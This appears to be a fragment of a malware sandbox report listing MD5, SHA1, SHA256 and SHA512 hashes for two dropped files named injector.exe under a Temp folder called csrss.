SHA512 1ea0b4a0b7a0c7153bdf4725c911f7af7f20475864f3e0095bb971ca009d9e4b2de1b1c51a04a0dd482acc337907b437073e33c12792ce2b72a65e62f78087fa

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 5972f8a92166f37c67a3d70921794c96
SHA1 0974e74b29054f7edc6f2275804a44623a575bda
SHA256 e315541f6881f5032fefe499e1d82d7d36a6f51be91ee0f2422894aaa3644aaa
SHA512 f76cf38b5f6911d6da78d8fbd5b8c7cd53f6292c4f2e9094e6c5c0950a2cc755fb24e5c7d82b01b47c4ed7039832dfab23b2b89d6fc67e8babee4f197cc01498

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 1868d1207d734ac95ef900476b1d1fc2
SHA1 58dc6fd96a51edd9894302048989a40f239159c2
SHA256 7d75b5eb33370ba631f86ab8d9582866df942897066b2a12f10ae8b0202f48af
SHA512 ce2a0b5d43539278aebde9e7389db357e4bcaf864227f46abc8565361c17ccfbac0a9c0ef058b71f35cb0331b910a70f40de9c9f05232fd8f7d5044ffefc470c
